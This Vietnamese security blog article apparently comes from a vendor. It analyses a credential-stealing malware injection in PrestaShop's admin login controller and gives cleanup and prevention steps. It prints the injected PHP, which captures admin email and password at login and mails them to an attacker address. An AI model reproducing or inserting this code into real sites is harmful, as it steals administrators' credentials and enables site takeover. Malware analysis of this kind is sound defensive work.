Là một nền tảng thương mại điện tử đang phát triển, Prestashop là một mục tiêu khổng lồ của các hacker muốn đánh cắp thông tin. Thông thường, thông tin được nhắm mục tiêu là số thẻ tín dụng, nhưng gần đây, các nhà nghiên cứu của chúng tôi đã phát hiện ra một loại phần mềm độc hại đánh cắp thông tin xác thực mới nhắm mục tiêu đến các trang web Prestashop và đánh cắp thông tin đăng nhập quản trị trang web. Điều này có thể dẫn đến việc tiếp quản hoàn toàn trang web của bạn.
Cách hoạt động của phần mềm độc hại ăn cắp thông tin đăng nhập của Prestashop
Phần mềm độc hại đánh cắp thông tin đăng nhập Prestashop được phát hiện được đưa vào tệp ./controllers/admin/AdminLoginController.php trên các trang Prestashop như thế này:
public function processLogin()
{
/* Check fields validity */
$passwd = trim(Tools::getValue('passwd'));
$email = trim(Tools::getValue('email'));
$to = "admin@wsxdn.com";
$subject = "panel admin prestashop ". $_SERVER['SERVER_NAME'];
$header = "from: hacked <admin@wsxdn.com>";
$message = "Link : https://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] ."&up=hous \r\n email: $email \r\n pass: $passwd \r\n by bajatax -- sniper :v \r\n";
$message .= "Path : " . __file__;
$sentmail = @mail($to, $subject, $message, $header);
$sentmail1 = @mail($to, $subject, $message, $header);
Mã này được sử dụng để chuyển thông tin máy chủ đến các biến. Một số biến được truyền bao gồm tên người dùng và mật khẩu được sử dụng để đăng nhập vào Prestashop back-end. Thông tin thu thập này đôi khi được gửi đến địa chỉ email của tin tặc bằng PHP mail() function .
Email được gửi đi có mọi thứ mà kẻ tấn công cần để đăng nhập vào trang web Prestashop bị tấn công. Từ đó, họ có thể truy cập vào trang web. Điều này cho phép họ truy cập đầy đủ vào giao diện back-end của trang web của bạn. Điều này có nghĩa là họ có thể thay đổi nội dung, cài đặt các mô-đun hoặc plugin giả mạo / bị nhiễm và làm nhiều việc khác.
Trong một số trường hợp, nạn nhân của vụ hack này bắt đầu nhận được email trả lại - có thể là do Google phát hiện ra cuộc tấn công và vô hiệu hóa / báo cáo các tài khoản liên quan.
Kẻ tấn công / nhóm tấn công đang chạy chiến dịch lây nhiễm phần mềm độc hại này được cho là có tên là bajatx / B4JAT4T.
Cách khắc phục trang web của bạn sau khi bị nhiễm phần mềm độc hại đánh cắp thông tin đăng nhập trước khi mua hàng
1. Sao lưu trang web của bạn trước khi làm sạch.
Bạn nên đưa trang web vào chế độ ngoại tuyến để người dùng không truy cập các trang bị nhiễm khi bạn đang làm sạch nó. Đảm bảo sao lưu tất cả các tệp và cơ sở dữ liệu cốt lõi. Bạn nên sao lưu ở định dạng tệp nén, chẳng hạn như .zip.
2. Thay thế các tệp lõi, plugin và chủ đề.
Bạn có thể thay thế các tệp lõi bị nhiễm bằng phiên bản gốc của cùng một nguồn từ các nguồn có uy tín. Sau khi tải xuống các phiên bản mới và cập nhật của các tệp &thư mục này, bạn có thể xóa các phiên bản cũ hơn. Điều này đặc biệt quan trọng trong việc dọn dẹp phần mềm độc hại đánh cắp thông tin đăng nhập Prestashop, vì mã độc đã được tìm thấy bên trong các tệp lõi.
3. Làm sạch mọi tệp đáng ngờ, được sửa đổi gần đây.
Bạn có thể tìm thấy các tệp có khả năng bị nhiễm bằng cách xem các tệp đã được sửa đổi gần đây. Bạn có thể khôi phục các tệp này từ một bản sao lưu sạch mà bạn có hoặc từ một nguồn đáng tin cậy.
4. Chạy quét phần mềm độc hại.
Chạy quét phần mềm độc hại trên máy chủ web của bạn để tìm phần mềm độc hại và các tệp độc hại. Bạn có thể sử dụng công cụ ‘Trình quét vi-rút’ trong cPanel do máy chủ lưu trữ web của bạn cung cấp hoặc yêu cầu chuyên gia dọn dẹp phần mềm độc hại bằng Astra Pro Plan, công cụ này sẽ chặn cuộc tấn công và cả các bot cố tải xuống dữ liệu bị đánh cắp.
Ngoài các bước này, bạn có thể thấy bài viết này hữu ích về bảo mật Prestashop.
Cách ngăn chặn các cuộc tấn công tiếp theo
Sau khi sửa trang web của bạn, đây là một số phương pháp bảo mật tốt cần tuân theo để đảm bảo rằng trang web của bạn luôn an toàn trước phần mềm độc hại ăn cắp thông tin đăng nhập Prestashop:
- Đảm bảo rằng bạn đang chạy bản cập nhật phần mềm mới nhất của mình
- Sử dụng bộ xử lý thanh toán của bên thứ ba đáng tin cậy
- Thực hiện quét phần mềm độc hại thường xuyên / kiểm tra bảo mật
- Đầu tư vào tường lửa
Cách chắc chắn duy nhất để bảo vệ trang web của bạn khỏi các phương pháp ngày càng phát triển của tin tặc là đầu tư vào bảo mật. Bạn nên đầu tư vào tường lửa trang web, chạy quét phần mềm độc hại thường xuyên và kiểm tra bảo mật thường xuyên vì điều đó có thể cung cấp cho bạn ý tưởng tuyệt vời về bảo mật tổng thể của trang web của bạn.